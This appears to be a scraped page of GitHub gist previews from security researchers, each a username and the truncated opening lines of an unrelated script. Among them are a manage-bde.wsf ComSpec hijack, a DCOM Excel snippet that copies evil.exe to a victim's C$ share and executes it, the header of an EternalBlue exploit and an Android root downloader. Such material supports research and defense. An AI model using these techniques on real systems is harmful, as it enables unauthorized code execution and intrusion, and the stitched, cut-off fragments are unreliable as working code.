bohops

I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'.  It may be located in SYSTEM32.

Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.

Here are a few examples that you may or may not find useful - 

1) Replace ComSpec Variable

set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf

Neo23x0

# IMPORTANT!
# This gist has been transformed into a github repo 
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd

#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  / 
#   / ___ / /_/ / /_/ / / /_/ /_/ /  
#  /_/  |_\__,_/\__,_/_/\__/\__,_/   

hfiref0x

typedef interface IFwCplLua IFwCplLua;

typedef struct IFwCplLuaInterfaceVtbl {

    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in IFwCplLua * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

rxwx

$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

mattifestation

cryptolok

#!/bin/bash

# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)

# sudo apt install curl

parse(){
    local IFS=\>
    read -d \< CELL VALUE
}

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

mattifestation

#region Step #1 (optional): Salvaging of drivers

 # I had to manually install a disk and network driver the last time I installed Nano Server.
 # I saved my previous WIM file and exported the installed drivers using the Dism cmdlets.

# These paths are specific to my system.
# This was my old Nano Server TP5 image.
$NanoTP5ImagePath =  'C:\Users\Matt\Desktop\Temp\NanoTP5Setup\NanoServerBin\NanoServer.wim'
$WimTempMountDir =   'C:\Users\Matt\Desktop\TempMountDir'
$ExportedDriverDir = 'C:\Users\Matt\Desktop\ExportedDrivers'

plutooo

/*
  Scramble/descramble raw NAND dumps from the NES Classic.
  plutoo 2016

  Cheers to brizzo, derrek.
*/

#include <stdio.h>
#include <string.h>
#include <stdint.h>

Arinerron

#!/bin/bash

# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;

# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";